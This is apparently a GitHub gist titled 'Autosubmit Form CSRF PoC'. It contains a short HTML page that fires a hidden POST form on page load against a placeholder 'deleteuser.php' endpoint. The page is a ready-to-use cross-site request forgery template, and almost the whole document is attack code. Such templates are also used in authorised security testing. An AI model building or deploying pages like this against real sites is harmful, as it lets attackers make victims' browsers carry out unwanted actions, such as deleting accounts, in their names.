Created
January 18, 2021 20:41
-
-
Save leveled/2617043e88de3a60c694320a87fd25d7 to your computer and use it in GitHub Desktop.
Autosubmit Form CSRF PoC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body onload="document.createElement('form').submit.call(document.getElementById('myForm'))"> | |
| <form id="myForm" name="myForm" action="http://example.com/deleteuser.php" method="POST"> | |
| <input type=hidden name="val1" id="val1" value="value1"/> | |
| <input type=hidden name="val2" id="val2" value="value2"/> | |
| <input type=hidden name="val3" id="val3" value="value3"/> | |
| <input type=hidden name="submit" id="submit" value="Continue"/> | |
| </form> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment